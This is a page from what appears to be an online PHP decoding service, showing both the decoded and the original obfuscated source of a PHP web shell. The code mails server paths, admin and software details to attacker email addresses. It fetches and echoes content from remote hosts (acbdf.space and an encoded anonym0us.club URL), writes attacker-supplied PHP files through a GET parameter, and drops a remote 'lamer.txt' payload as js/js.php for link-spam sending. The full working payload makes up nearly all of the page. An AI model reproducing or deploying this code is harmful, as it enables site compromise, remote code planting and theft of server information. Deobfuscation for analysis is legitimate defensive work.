Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto zuE8Y; ircSH: if (function_exists("\x63\165\x72\154\137\151\156\151\x74")) { $ch =..
Decoded Output download
<?
goto zuE8Y; ircSH: if (function_exists("curl_init")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("file_get_contents")) { @($gitt = file_get_contents($x)); } goto zfr2q; gq3V0: if (isset($_GET["ksfg"])) { $f = fopen($_GET["ksfg"] . ".php", "a"); fwrite($f, file_get_contents($s . "s-" . $_GET["ksfg"])); fclose($f); } goto wgJRs; cAKiE: $from_shellcode = "lamer@" . gethostbyname($_SERVER["SERVER_NAME"]) . ''; goto bC6K7; RO_N6: $host = str_replace("www.", '', @$_SERVER["HTTP_HOST"]); goto QweEB; kxK_z: $s = "https://acbdf.space/"; goto RO_N6; FlSlA: $EL_MuHaMMeD .= "Server isletim sistemi : " . $_SERVER["SERVER_SOFTWARE"] . "\xd
"; goto weRCK; bGHCq: mail($kime, $baslik, $EL_MuHaMMeD); goto kcr_p; m66Sg: @mail($to_email, $server_mail, $linkcr, $header); goto NJV30; bC6K7: $to_email = "[email protected]"; goto jQT0a; U6zh9: $x = base64_decode("aHR0cHM6Ly9hbm9ueW0wdXMuY2x1Yi9sLQ==") . GetIP() . "-" . base64_encode("http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); goto ircSH; FgH_0: $EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER["DOCUMENT_ROOT"] . "
"; goto SWWC4; NJV30: $kime = "[email protected]"; goto g9iQ_; LDwl8: $linkcr = "Link: " . $_SERVER["SERVER_NAME"] . '' . $_SERVER["REQUEST_URI"] . " - IP Excuting: {$ip_remote} - Time: {$time_shell}"; goto zdKce; zdKce: $header = "From: {$from_shellcode}\xd\xaReply-to: {$from_shellcode}"; goto m66Sg; SWWC4: $EL_MuHaMMeD .= "Server Admin : " . $_SERVER["SERVER_ADMIN"] . "\xd
"; goto FlSlA; MGOrl: if (function_exists("curl_init")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("file_get_contents")) { @($gitt = file_get_contents($x)); } goto T2c2_; g9iQ_: $baslik = "min 20203"; goto FgH_0; FAQFP: if ($datasi) { } else { @mkdir("js"); $dos = file_get_contents("https://acbdf.space/txt/lamer.txt"); $data = "js/js.php"; @touch("js/js.php"); $ver = @fopen($data, "w"); @fwrite($ver, $dos); @fclose($ver); $yol = "http://" . $_SERVER["HTTP_HOST"] . '' . $_SERVER["REQUEST_URI"] . ''; $y = "<h1>Sender Yazdirildi.<br/> SITE YOL : " . $yol . "<br/>Sender Yolu : js/crs.php</h1>"; $header .= "From: SheLL Boot <[email protected]>
"; $header .= "Content-Type: text/html;
charset=utf-8\xa"; @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); } goto XyiyH; UIPyy: if ($_POST["query"]) { $veriyfy = stripslashes(stripslashes($_POST["query"])); $data = "data.txt"; @touch("data.txt"); $ver = @fopen($data, "w"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("data.txt", "r"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto jl6VM; XyiyH: $time_shell = '' . date("d/m/Y - H:i:s") . ''; goto YBtgQ; zfr2q: error_reporting(0); goto kxK_z; jl6VM: $datasi = @fopen("js/js.php", "r"); goto FAQFP; T2c2_: echo $gitt; goto gq3V0; nmhQ_: $EL_MuHaMMeD .= "Avlanan Site : " . $_SERVER["HTTP_HOST"] . "\xd\xa"; goto bGHCq; QweEB: $x = $s . "l-" . base64_encode($host); goto MGOrl; weRCK: $EL_MuHaMMeD .= "Shell Link : http://" . $_SERVER["SERVER_NAME"] . $_SERVER["PHP_SELF"] . "\xd
"; goto nmhQ_; YBtgQ: $ip_remote = $_SERVER["REMOTE_ADDR"]; goto cAKiE; jQT0a: $server_mail = '' . gethostbyname($_SERVER["SERVER_NAME"]) . " - " . $_SERVER["HTTP_HOST"] . ''; goto LDwl8; wgJRs: echo "<!DOCTYPE html!>"; goto UIPyy; zuE8Y: function GetIP() { if (getenv("HTTP_CLIENT_IP")) { $ip = getenv("HTTP_CLIENT_IP"); } elseif (getenv("HTTP_X_FORWARDED_FOR")) { $ip = getenv("HTTP_X_FORWARDED_FOR"); if (strstr($ip, ",")) { $tmp = explode(",", $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("REMOTE_ADDR"); } return $ip; } goto U6zh9; kcr_p: ?>Did this file decode correctly?
Original Code
goto zuE8Y; ircSH: if (function_exists("\x63\165\x72\154\137\151\156\151\x74")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("\146\x69\154\x65\137\x67\x65\164\x5f\x63\x6f\x6e\164\x65\156\164\x73")) { @($gitt = file_get_contents($x)); } goto zfr2q; gq3V0: if (isset($_GET["\153\x73\x66\x67"])) { $f = fopen($_GET["\x6b\x73\x66\x67"] . "\56\160\x68\x70", "\141"); fwrite($f, file_get_contents($s . "\163\x2d" . $_GET["\x6b\x73\146\x67"])); fclose($f); } goto wgJRs; cAKiE: $from_shellcode = "\x6c\141\155\x65\x72\100" . gethostbyname($_SERVER["\x53\105\x52\126\x45\x52\x5f\x4e\101\x4d\x45"]) . ''; goto bC6K7; RO_N6: $host = str_replace("\167\x77\167\x2e", '', @$_SERVER["\110\124\124\120\137\110\x4f\x53\x54"]); goto QweEB; kxK_z: $s = "\x68\164\x74\160\x73\x3a\57\57\x61\143\x62\144\x66\x2e\x73\x70\x61\143\x65\57"; goto RO_N6; FlSlA: $EL_MuHaMMeD .= "\123\145\x72\x76\x65\162\40\x69\163\154\x65\164\151\155\x20\x73\x69\163\164\145\x6d\151\x20\x3a\x20" . $_SERVER["\x53\x45\122\x56\105\x52\137\123\117\x46\x54\127\x41\x52\x45"] . "\xd\12"; goto weRCK; bGHCq: mail($kime, $baslik, $EL_MuHaMMeD); goto kcr_p; m66Sg: @mail($to_email, $server_mail, $linkcr, $header); goto NJV30; bC6K7: $to_email = "\x6c\157\147\151\156\x6f\x6c\x64\x75\155\x40\x67\x6d\141\151\154\x2e\x63\157\x6d"; goto jQT0a; U6zh9: $x = base64_decode("\141\110\122\60\143\110\115\66\114\x79\71\x68\x62\x6d\71\165\x65\127\x30\167\144\x58\x4d\x75\131\62\170\x31\x59\x69\x39\x73\114\x51\75\75") . GetIP() . "\x2d" . base64_encode("\150\164\164\160\72\57\57" . $_SERVER["\110\x54\x54\x50\137\110\117\x53\124"] . $_SERVER["\x52\105\121\x55\105\x53\124\137\x55\122\111"]); goto ircSH; FgH_0: $EL_MuHaMMeD = "\x44\157\x73\x79\141\40\131\x6f\x6c\165\40\72\40" . $_SERVER["\x44\x4f\x43\x55\x4d\105\116\x54\137\x52\x4f\117\x54"] . "\15\12"; goto SWWC4; NJV30: $kime = "\142\171\x68\x65\x72\x6f\64\x34\100\x67\x6d\x61\x69\154\56\143\x6f\x6d"; goto g9iQ_; LDwl8: $linkcr = "\114\151\x6e\x6b\72\x20" . $_SERVER["\x53\x45\x52\126\105\122\137\x4e\101\x4d\x45"] . '' . $_SERVER["\122\105\121\x55\x45\x53\124\x5f\x55\x52\x49"] . "\x20\55\40\x49\120\x20\105\170\x63\x75\x74\x69\156\x67\x3a\x20{$ip_remote}\40\x2d\x20\x54\x69\x6d\x65\72\40{$time_shell}"; goto zdKce; zdKce: $header = "\106\162\x6f\x6d\72\40{$from_shellcode}\xd\xa\122\x65\x70\154\x79\55\164\157\72\40{$from_shellcode}"; goto m66Sg; SWWC4: $EL_MuHaMMeD .= "\123\x65\162\x76\x65\x72\x20\101\144\155\151\x6e\x20\72\40" . $_SERVER["\123\105\122\126\x45\122\x5f\101\104\115\111\116"] . "\xd\12"; goto FlSlA; MGOrl: if (function_exists("\143\165\162\x6c\137\x69\156\151\x74")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("\146\151\x6c\x65\137\147\145\164\137\143\157\x6e\x74\145\x6e\x74\x73")) { @($gitt = file_get_contents($x)); } goto T2c2_; g9iQ_: $baslik = "\x6d\x69\x6e\40\x32\60\62\x30\63"; goto FgH_0; FAQFP: if ($datasi) { } else { @mkdir("\x6a\163"); $dos = file_get_contents("\x68\164\164\160\x73\x3a\x2f\x2f\141\x63\x62\144\146\56\x73\160\141\143\145\57\x74\x78\164\57\154\141\x6d\x65\x72\x2e\164\x78\x74"); $data = "\x6a\x73\57\x6a\163\56\x70\150\160"; @touch("\152\163\57\152\163\56\x70\150\160"); $ver = @fopen($data, "\167"); @fwrite($ver, $dos); @fclose($ver); $yol = "\x68\x74\x74\x70\72\x2f\57" . $_SERVER["\110\124\x54\120\x5f\x48\117\x53\124"] . '' . $_SERVER["\122\105\121\x55\x45\x53\x54\x5f\x55\122\x49"] . ''; $y = "\74\x68\61\76\123\x65\156\144\x65\x72\40\x59\141\172\x64\151\x72\x69\154\144\151\x2e\74\142\162\x2f\x3e\40\x53\111\124\x45\x20\131\x4f\114\x20\72\x20" . $yol . "\x3c\x62\162\57\x3e\123\145\156\x64\145\162\x20\131\157\x6c\165\x20\72\x20\152\x73\57\143\162\163\x2e\160\150\x70\x3c\x2f\150\x31\76"; $header .= "\106\x72\157\155\72\x20\x53\150\x65\x4c\x4c\40\102\157\157\x74\x20\74\x73\165\x70\x70\x6f\162\100\156\151\143\x2e\x6f\x72\147\x3e\12"; $header .= "\x43\157\x6e\164\x65\156\164\55\x54\x79\160\x65\72\40\x74\145\x78\x74\57\x68\164\155\x6c\x3b\12\x20\x63\x68\141\x72\163\145\164\75\x75\x74\146\x2d\x38\xa"; @mail("\x6c\x6f\147\151\x6e\x6f\x6c\x64\x75\155\x40\x67\155\141\151\x6c\x2e\143\x6f\155", "\110\x61\143\x6b\154\151\x6e\153\x20\x42\x69\154\144\151\162\x69", "{$y}", $header); @mail("\x6c\x6f\147\151\156\x6f\154\144\x75\155\x40\147\x6d\x61\151\x6c\x2e\x63\x6f\x6d", "\110\141\143\153\x6c\x69\x6e\x6b\40\x42\151\x6c\144\x69\162\151", "{$y}", $header); } goto XyiyH; UIPyy: if ($_POST["\161\165\145\162\171"]) { $veriyfy = stripslashes(stripslashes($_POST["\x71\165\145\162\x79"])); $data = "\x64\141\164\x61\x2e\164\170\164"; @touch("\x64\141\x74\141\x2e\x74\170\164"); $ver = @fopen($data, "\167"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("\x64\141\164\141\56\x74\170\164", "\162"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto jl6VM; XyiyH: $time_shell = '' . date("\x64\x2f\x6d\x2f\x59\40\55\x20\110\72\x69\72\x73") . ''; goto YBtgQ; zfr2q: error_reporting(0); goto kxK_z; jl6VM: $datasi = @fopen("\152\163\57\x6a\x73\x2e\160\150\160", "\162"); goto FAQFP; T2c2_: echo $gitt; goto gq3V0; nmhQ_: $EL_MuHaMMeD .= "\x41\166\154\141\x6e\x61\x6e\40\123\x69\164\145\40\72\40" . $_SERVER["\110\124\x54\x50\137\110\117\x53\124"] . "\xd\xa"; goto bGHCq; QweEB: $x = $s . "\x6c\x2d" . base64_encode($host); goto MGOrl; weRCK: $EL_MuHaMMeD .= "\x53\x68\145\x6c\x6c\40\x4c\x69\156\x6b\40\x3a\x20\150\x74\x74\x70\x3a\x2f\x2f" . $_SERVER["\123\105\122\126\105\x52\137\116\x41\115\x45"] . $_SERVER["\120\x48\120\137\123\x45\114\106"] . "\xd\12"; goto nmhQ_; YBtgQ: $ip_remote = $_SERVER["\x52\105\x4d\117\x54\105\137\101\x44\104\x52"]; goto cAKiE; jQT0a: $server_mail = '' . gethostbyname($_SERVER["\123\x45\x52\126\x45\x52\137\x4e\101\115\x45"]) . "\x20\40\x2d\40" . $_SERVER["\110\x54\124\x50\x5f\110\x4f\123\x54"] . ''; goto LDwl8; wgJRs: echo "\74\41\x44\117\x43\x54\131\x50\105\40\x68\x74\x6d\x6c\x21\76"; goto UIPyy; zuE8Y: function GetIP() { if (getenv("\x48\124\124\120\x5f\x43\114\111\105\116\124\137\x49\x50")) { $ip = getenv("\110\124\124\x50\x5f\x43\114\111\x45\x4e\124\137\x49\120"); } elseif (getenv("\x48\x54\x54\x50\137\x58\x5f\x46\117\122\x57\x41\x52\x44\105\x44\x5f\106\x4f\122")) { $ip = getenv("\x48\x54\124\x50\137\x58\137\x46\117\122\x57\101\x52\x44\x45\104\137\x46\117\122"); if (strstr($ip, "\x2c")) { $tmp = explode("\54", $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("\x52\x45\115\x4f\124\x45\137\101\104\x44\x52"); } return $ip; } goto U6zh9; kcr_p: Function Calls
| None |
Stats
| MD5 | 740c069677543d99b8e526afc893ca71 |
| Eval Count | 0 |
| Decode Time | 47 ms |